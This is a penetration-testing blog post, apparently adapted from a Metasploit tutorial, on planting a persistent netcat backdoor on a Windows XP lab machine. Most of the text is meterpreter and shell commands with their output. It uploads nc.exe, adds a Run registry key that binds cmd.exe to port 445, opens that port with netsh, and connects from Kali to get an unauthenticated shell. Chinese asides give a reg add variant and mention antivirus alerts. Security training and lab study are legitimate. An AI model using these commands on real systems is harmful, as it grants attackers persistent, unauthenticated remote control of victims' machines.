Persistent Netcat Backdoor
In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.
First, we must upload a copy of netcat to the remote system.
运行下面代码
meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32 [*] uploading : /tmp/nc.exe -> C:\windows\system32 [*] uploaded : /tmp/nc.exe -> C:\windows\system32nc.exe
Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.
运行下面代码
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run Enumerating: HKLM\software\microsoft\windows\currentversion\run Values (3): VMware Tools VMware User Process quicktftpserver meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe' Successful set nc. meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc Key: HKLM\software\microsoft\windows\currentversion\Run Name: nc Type: REG_SZ Data: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe
使用命令行自带的reg命令也行, 前提是系统杀毒软件不出提示:
运行下面代码
REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"
Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.
运行下面代码
meterpreter > execute -f cmd -i Process 1604 created. Channel 1 created. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode Netsh firewall show opmode Domain profile configuration: ------------------------------------------------------------------- Operational mode = Enable Exception mode = Enable Standard profile configuration (current): ------------------------------------------------------------------- Operational mode = Enable Exception mode = Enable Local Area Connection firewall configuration: ------------------------------------------------------------------- Operational mode = Enable
We open up port 445 in the firewall and double-check that it was set properly.
运行下面代码
C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL Ok. C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening netsh firewall show portopening Port configuration for Domain profile: Port Protocol Mode Name ------------------------------------------------------------------- 139 TCP Enable NetBIOS Session Service 445 TCP Enable SMB over TCP 137 UDP Enable NetBIOS Name Service 138 UDP Enable NetBIOS Datagram Service Port configuration for Standard profile: Port Protocol Mode Name ------------------------------------------------------------------- 445 TCP Enable Service Firewall 139 TCP Enable NetBIOS Session Service 445 TCP Enable SMB over TCP 137 UDP Enable NetBIOS Name Service 138 UDP Enable NetBIOS Datagram Service C:\Documents and Settings\Jim\My Documents >
So with that being completed, we will reboot the remote system and test out the netcat shell.
运行下面代码
root@kali:~# nc -v 172.16.104.128 445 172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [172.16.104.128] 445 (?) open Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\Jim > dir dir Volume in drive C has no label. Volume Serial Number is E423-E726 Directory of C:\Documents and Settings\Jim 05/03/2009 01:43 AM . 05/03/2009 01:43 AM .. 05/03/2009 01:26 AM 0 ;i 05/12/2009 10:53 PM Desktop 10/29/2008 05:55 PM Favorites 05/12/2009 10:53 PM My Documents 05/03/2009 01:43 AM 0 QCY 10/29/2008 03:51 AM Start Menu 05/03/2009 01:25 AM 0 talltelnet.log 05/03/2009 01:25 AM 0 talltftp.log 4 File(s) 0 bytes 6 Dir(s) 35,540,791,296 bytes free C:\Documents and Settings\Jim >
Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.
.使用sc创建自定义服务,留下后门, 但是有个问题是360还是会提示, 防止注册表被写入
作者: NONO
出处:http://www.cnblogs.com/diligenceday/
企业网站:http://www.idrwl.com/
开源博客:http://sqqihao.github.io/
QQ:287101329
微信:18101055830
本文作者:方方和圆圆
本文链接:https://www.cnblogs.com/diligenceday/p/6882085.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
2014-08-22 自己的一个js库